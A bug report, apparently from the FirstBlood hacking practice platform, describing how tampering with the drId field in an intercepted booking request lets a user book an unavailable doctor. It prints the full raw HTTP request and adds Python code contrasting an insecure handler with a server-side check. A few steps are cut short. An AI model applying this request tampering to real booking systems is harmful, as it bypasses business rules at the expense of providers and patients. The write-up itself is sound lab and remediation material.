FirstBlood-#1027 — Can make book appointment to unavailable doctor
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay Level 7 reported:
Hello, I found a way to book an appointment with an unavailable doctor.
When booking an appointment, turn Burp Suite intercept ON.
Then fill in all the required info and click
On the intercepted request, add
POST /api/ba.php HTTP/1.1
Host: e00b0c1f0b0b-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 82070-4702-33892
Content-Length: 137
Origin: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com
Referer: https://e00b0c1f0b0b-properlay.a.firstbloodhackers.com/book-appointment.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

fname=test&lname=test&address=test&city=test&phonenumber=123123&email=23123&dob=12/04/2022&a1=&a2=&a3=&message=&slot=3&drId=1
- Forward the request; you will see that you booked an appointment with Julie (a doctor who is unavailable for booking).
You can book an appointment with an unavailable doctor.
FirstBlood ID: 67
Vulnerability Type: Application/Business Logic
It is possible to book an unavailable doctor
Creator & Administrator
Congratulations, you were the first to report this!
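The root cause in this report is that the booking endpoint trusts the client-supplied drId and never re-checks on the server whether that doctor can be booked. The example below is an added illustration, not FirstBlood's own code: it parses a form body shaped like the one in the report and contrasts a handler that trusts drId with one that enforces availability server-side. The doctor table, slot list and availability flags are constructed for the example.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed doctor data for the example; IDs, names and availability are
# assumptions, not taken from the real application.
DOCTORS = {
    1: {"name": "Julie", "available": False},  # shown as unavailable in the UI
    2: {"name": "Sam", "available": True},
}
# Slots each bookable doctor actually offers (constructed).
SLOTS_PER_DOCTOR = {2: {1, 2, 3}}


@dataclass
class BookingResult:
    ok: bool
    reason: str


def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def book_insecure(form: dict) -> BookingResult:
    """Mirrors the reported flaw: any doctor ID that exists gets booked,
    because the availability check lives only in the front-end form."""
    dr = int(form["drId"])
    if dr not in DOCTORS:
        return BookingResult(False, "unknown doctor")
    return BookingResult(True, f"booked {DOCTORS[dr]['name']}")


def book_secure(form: dict) -> BookingResult:
    """Re-validates drId and slot against server-side state; a hidden UI
    option is not an access control, so the server must reject it itself."""
    try:
        dr = int(form.get("drId", ""))
        slot = int(form.get("slot", ""))
    except ValueError:
        return BookingResult(False, "malformed drId or slot")
    doc = DOCTORS.get(dr)
    if doc is None or not doc["available"]:
        return BookingResult(False, "doctor not available for booking")
    if slot not in SLOTS_PER_DOCTOR.get(dr, set()):
        return BookingResult(False, "slot not offered by this doctor")
    return BookingResult(True, f"booked {doc['name']}")


# Body shaped like the intercepted request in the report (values constructed).
REPORT_BODY = "fname=test&lname=test&phonenumber=123123&slot=3&drId=1"
```

Running both handlers over REPORT_BODY shows the insecure version booking Julie while the secure version rejects the request; the same secure check also blocks a valid doctor paired with a slot that doctor does not offer.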